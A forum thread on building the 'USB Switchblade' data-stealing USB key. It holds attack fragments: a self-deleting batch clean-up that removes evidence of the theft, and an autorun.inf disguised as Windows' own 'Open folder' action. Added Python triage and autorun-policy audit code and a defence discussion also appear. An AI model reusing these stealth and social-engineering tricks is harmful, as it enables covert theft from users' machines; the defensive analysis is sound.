USB Switchblade Development


Darren Kitchen


This is all for non U3 versions - it may be applicable to U3, but as I don't have it, I won't speculate...

I've tried Silivrenion's version of the Switchblade, and have added the following to the batch file:

if not exist "Removable Disk" md "Removable Disk" >nul

Start explorer.exe "Removable Disk"

This is a slight improvement in that it:

a) Does something after trying to open the USB drive

b) opens into a folder other than the one containing all the dodgy stuff ;)

You can obviously change this to do what you like. Bearing in mind that it's a 'SocEng' (wetware) exploit to get someone to run the code, opening a folder that has a load of .exes, or hidden folders/files, batch files, or a combination is going to worry people somewhat.

So the initial fix is to open a new folder that doesn't contain all the naughty stuff.

I'm working on 2 vastly superior versions of this - will post once done


Irving Washington's One Time Version

This is an updated version of Silivrenion's Technique, which uses a modified batch file to remove evidence of the steal and launch Explorer.exe following the data theft.

This means the USB key can only be used once before needing 'priming' again, but has the benefits of appearing as though nothing has happened (other than a slightly slow Explorer launch).

Mods to Siliv's version are as follows:

Add the following to switchblade.bat before :End

cd ....

DEL /f /q nircmd.exe > nul

DEL /f /q autorun.inf > nul 

RMDIR /s /q WIP > nul 

Start explorer.exe . 

DEL /f /q switchblade.bat >nul

If you want, you can use the ATTRIB command to hide the logfile(s), but be warned that people like myself who enable the 'show hidden files' view will still see these files and be intrigued...


Damn this works well.

I edited the autorun.inf file (on the amish/non-u3 version) to make it more realistic:

[autorun]

action=Open folder to view files

icon=iconsfolder.ico

shellexecute=nircmd.exe execmd CALL batexeprogstart.bat

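The two artefacts the thread has built up so far, the autorun.inf above whose action text copies Windows' own "Open folder to view files" entry, and Irving Washington's clean-up batch file that deletes nircmd, autorun.inf and then itself, are exactly what a defender wants to recognise on a found USB key. The following is an added example, not code from the Switchblade project or from any poster in this thread. It parses an autorun.inf, reports what it would launch and why the action entry is deceptive, and scans a batch file for the evidence-removal pattern. The sample contents at the bottom are constructed from the posts above; the backslashes in the icon and script paths are an assumption, since the forum rendering stripped them.

```python
"""Triage an autorun.inf and its companion batch file (added example)."""
import configparser
import re

# Directives that make Windows run something from the device: 'open' is
# executed directly where autorun is honoured; 'shellexecute' is handed to
# ShellExecute and is also what the AutoPlay 'action' entry runs.
LAUNCH_KEYS = ("open", "shellexecute")
# Windows' own AutoPlay label; copying it makes the fake entry blend in.
DEFAULT_ACTION_TEXT = "open folder to view files"
# Helpers commonly used to run a script with no visible console window.
WINDOW_HIDERS = ("nircmd", "cmdow", "hstart", "wscript", "cscript")

DEL_RE = re.compile(r"^\s*del\s+(?:/\w+\s+)*(?P<target>\S+)", re.I)
RMDIR_RE = re.compile(r"^\s*(?:rmdir|rd)\s+(?:/[sq]\s+){2}", re.I)
START_EXPLORER_RE = re.compile(r"^\s*start\s+explorer(?:\.exe)?\b", re.I)


def parse_autorun(text):
    """Return the [autorun] section as a dict with lowercase keys ({} if missing)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k.lower(): (v or "").strip() for k, v in cp.items(section)}
    return {}


def autorun_findings(text):
    """List what an autorun.inf launches and which parts are deceptive."""
    section = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key in section:
            command = section[key]
            findings.append(f"{key}= runs: {command}")
            words = command.split()
            program = words[0].lower() if words else ""
            if any(h in program for h in WINDOW_HIDERS):
                findings.append(f"{key}= hides the payload window via {program}")
    action = section.get("action", "").lower()
    if action == DEFAULT_ACTION_TEXT and any(k in section for k in LAUNCH_KEYS):
        findings.append("action= copies the default AutoPlay text but runs a command")
    return findings


def batch_findings(text, script_name):
    """List evidence-removal behaviour in a batch file (self-delete etc.)."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = DEL_RE.match(line)
        if m:
            target = m.group("target").lower()
            if target == script_name.lower():
                findings.append(f"line {lineno}: deletes itself ({target})")
            elif target == "autorun.inf":
                findings.append(f"line {lineno}: removes autorun.inf after use")
            else:
                findings.append(f"line {lineno}: removes helper {target}")
        elif RMDIR_RE.match(line):
            findings.append(f"line {lineno}: silently removes a directory tree")
        elif START_EXPLORER_RE.match(line):
            findings.append(f"line {lineno}: opens Explorer so the insert looks normal")
    return findings


# Constructed samples based on the thread (assumed path separators).
SAMPLE_AUTORUN_INF = """[autorun]
action=Open folder to view files
icon=icons\\folder.ico
shellexecute=nircmd.exe execmd CALL bat\\exe\\progstart.bat
"""

SAMPLE_SWITCHBLADE_BAT = """@echo off
cd ....
DEL /f /q nircmd.exe > nul
DEL /f /q autorun.inf > nul
RMDIR /s /q WIP > nul
Start explorer.exe .
DEL /f /q switchblade.bat >nul
"""

if __name__ == "__main__":
    for f in autorun_findings(SAMPLE_AUTORUN_INF):
        print("autorun.inf:", f)
    for f in batch_findings(SAMPLE_SWITCHBLADE_BAT, "switchblade.bat"):
        print("switchblade.bat:", f)
```

Run it against the root of a suspect drive's autorun.inf and any .bat it references; a device whose only autorun entries are label= and icon= produces no findings, which is the point of the comparison.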

Sorry for double post, but I just have something involving morals to say.

I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want.

AV's should realise that we do want to learn about this stuff. It is very useful to know.

Besides, how can an AV block a social trick in autorun.inf? There are some things we NEED to know about.



You could just disable autorun like most of the people I know (they disable it because they hate the annoying pop-up when they put in CDs :wink: ) and you'll be completely safe from this attack, and Norton AV 2003 does ask if you want to run the program from the removable media object (something along those lines) if you use the non-U3 way.


Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition?

I know some people just use common sense instead of any real AV, but very little can be trusted.

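The reply above says that disabling autorun makes you "completely safe", and the follow-up asks who would expect a flash disk to carry a CD partition. Whether both delivery methods in this thread are stopped depends on which drive types the NoDriveTypeAutoRun policy value actually covers. The block below is an added example, not code from the thread or from any Hak5 tool: it models the documented bit layout of that value (a set bit disables autorun for that drive type) and audits a given setting against the non-U3 method (removable mass storage) and the U3 method (an emulated CD-ROM). The registry read is shown only as a comment because the winreg module exists only on Windows.

```python
r"""Which drive types does a NoDriveTypeAutoRun value still let autorun?

Policy location (machine-wide; a per-user copy under HKCU also applies):
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
  NoDriveTypeAutoRun (REG_DWORD)
Windows' default is 0x91; 0xFF disables autorun for every drive type.
"""

DRIVE_TYPE_BITS = {
    "unknown": 0x01,
    "no_root_dir": 0x02,
    "removable": 0x04,     # mass-storage part of a USB key (non-U3 method)
    "fixed": 0x08,
    "remote": 0x10,
    "cdrom": 0x20,         # also the emulated CD partition of a U3 key
    "ramdisk": 0x40,
    "unrecognised": 0x80,  # drive types Windows does not classify
}
WINDOWS_DEFAULT = 0x91   # unknown | remote | unrecognised
DISABLE_ALL = 0xFF


def autorun_allowed(value, drive_type):
    """True if autorun is still honoured for drive_type under this value."""
    return not (value & DRIVE_TYPE_BITS[drive_type])


def allowed_types(value):
    """All drive types a value still allows to autorun."""
    return [t for t in DRIVE_TYPE_BITS if autorun_allowed(value, t)]


def audit(value):
    """Return (safe, reasons): which Switchblade delivery methods still work."""
    reasons = []
    if autorun_allowed(value, "removable"):
        reasons.append("mass-storage autorun.inf (non-U3 method) still honoured")
    if autorun_allowed(value, "cdrom"):
        reasons.append("CD-ROM autorun (U3 CD partition) still honoured")
    return (not reasons, reasons)


# On Windows the live value would be read like this (assumption: the
# machine-wide policy; check HKEY_CURRENT_USER with the same path too):
#   import winreg
#   key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
#       r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer")
#   value, _ = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")

if __name__ == "__main__":
    for name, value in (("Windows default", WINDOWS_DEFAULT),
                        ("0xFF", DISABLE_ALL),
                        ("removable only", DRIVE_TYPE_BITS["removable"])):
        safe, reasons = audit(value)
        print(f"{name} (0x{value:02X}): {'safe' if safe else '; '.join(reasons)}")
```

Two caveats a practitioner should keep in mind: clearing only the removable bit leaves the U3 CD partition working, so 0xFF (or at least 0x24 set) is the setting to check for; and on Windows XP the value was only fully honoured after Microsoft's later autorun update (KB967715, which added HonorAutorunSetting), so on an unpatched box the registry value alone is not proof that the AutoPlay action entry is suppressed.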


Since USB keys went mainstream I've always been wary of the autorun threat, so much so that I've made it a habit to hold the shift key while inserting any untrusted media.


Sorry for the double post but two quick things:

1. Staples is having a sale on the U3 enabled Sandisk Cruzer Micro drives. I picked up a 512 MB in store for $14.99. The 1 GB is about $25 and the 2 GB is about $45. The sale works both online and in-store and is good until September 23rd (this Saturday). Now that I've got two I can have a lethal and non-lethal USB drive on my keychain.

2. I just got off the phone with the Sr. Editor of a well known computer magazine in the US. They will be printing a story about the USB Switchblade on their website some time tomorrow (I'll provide a link when it's live), and possibly on next week's print edition of the magazine. Way to go everyone who's contributed, this project is totally rocking! I feel like we're actually bringing awareness to both regular users and IT pros about these attack vectors. Hopefully the editor will say something nice about us.


I can't seem to find those prices...I found the 2GB for $90

http://www.circuitcity.com/ssm/SanDisk-Cru...roductDetail.do

I do see a 1GB for $45...unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40

I need to get one for general use anyways, as I don't even pwn one yet.


It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) but yeah, it's always a good idea to be careful with untrusted media...

Amish or MaxDamage technique?

Neither, though it would've been Amish's technique... I tried with a DIY autorun.inf with Notepad as the app to run and an app I think was called Ceedo which uses autorun to open a menu when you insert the device...

I did have the idea of using an MP3 player or a digital camera to store the stuff on for Amish's method because that'd look even less conspicuous, who's gonna suspect a digicam? I didn't get a chance to test that though since as I say it failed on Win2k3 and I don't have an XP box right now (thinking I should use a VM for testing stuff like this)



$15 512MB

$25 1GB

$45 2GB

Those links are from the Staples store in my area (Williamsburg, VA). AFAIK it's nationwide. I picked up a 512 MB for $15 today in Vienna, VA in store at that sale price.

Sale ends on the 23rd. We're not affiliated with Sandisk or Staples, but it's a damn good deal.

Both the U3 method and Amish method work great. I think Amish made clever use of some social engineering, but personally I'm a bit more fond of the U3 technique since it doesn't require any key presses/mouse clicks. (No offence Amish)


Another use for this could be a useful security device for you. If you can set the autorun to clean history, close encrypted shares etc., it's a lot easier than remembering / installing routines /applications to do this - basically it could mean that you can wipe traces from any machine you use...

Remember in episode 1x02 or 1x03 the Windows firewall automation script? My goal was to make changes to several Windows firewalls without the use of group policies, so I'd have to physically go to each machine. While the script wasn't malicious in nature it used the same technique as Amish's hack to run my firewall script. The same could be done with U3. I could see it being used for white hat purposes such as installing updates, latest anti-virus definitions, testing for security best practices. But then again, by the time the automation part actually starts to break even in time spent administrating each machine you're probably already in a domain environment with enough flexibility with the clients that this could all be automated from the server anyway. Ahh, thinking out loud again.


Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment.

http://passivemode.net/updates/2006/6/5/wi...on-exploit.html

It allows you to get admin using just the AT command.

I am working on integrating it into my USB key, I will let you know the results. Unfortunately it does mean the key has to be in there for about a minute and a half, but it might help.



Correct me if I'm wrong, but I don't think this works the way you think it does.

OK, the only way I got this to work was by trying from an admin account to escalate to SYSTEM; this did not work to escalate from limited user to SYSTEM. Maybe I did something wrong, but I think it was a proof of concept to get higher privileges than admin, not an actual escalation from limited to higher privilege.

-Sloth

